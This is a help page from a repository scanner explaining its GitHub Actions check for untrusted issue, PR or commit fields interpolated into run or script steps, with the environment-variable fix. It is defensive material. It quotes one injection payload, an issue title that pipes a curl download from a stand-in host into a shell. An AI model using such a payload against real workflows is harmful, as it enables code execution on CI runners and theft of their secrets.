Will It Vibe logoWill It Vibe?
GHA-009High severity-15 points

Untrusted input interpolated into a run/script step

Part of Security, which counts for 30% of the overall score. When this check fires it deducts 15 points from that category, once per scan, no matter how many places it turns up.

What it detects

A run or script step interpolates attacker-controlled context (issue/PR title or body, comment body, commit message, or a fork head ref) straight into the shell or JavaScript. A crafted value runs arbitrary commands on the runner with the job token and secrets in scope.

Why it matters

When a run or script step embeds ${{ github.event.issue.title }} or a similar untrusted field directly, GitHub substitutes the raw value into the script before the shell or JavaScript runs. An issue title like "; curl evil | sh #" then executes on the runner, which holds your job token and any secrets exposed to the step. This is the top GitHub Actions security issue.

How to fix it

Never interpolate untrusted context into a script. Pass it through an environment variable and reference the variable with normal quoting: set env: TITLE: ${{ github.event.issue.title }}, then use "$TITLE" in run. The env indirection stops the value from being parsed as code. Apply the same pattern to github-script by reading process.env instead of interpolating.

The paid report includes a ready-to-paste prompt for your AI coding agent for every check it finds, pointed at the exact findings from your scan. See pricing

Does your repo trip this check?

Paste a GitHub URL or drop a project folder. Scans run in your browser and take seconds.

Scan your repo

Related Security checks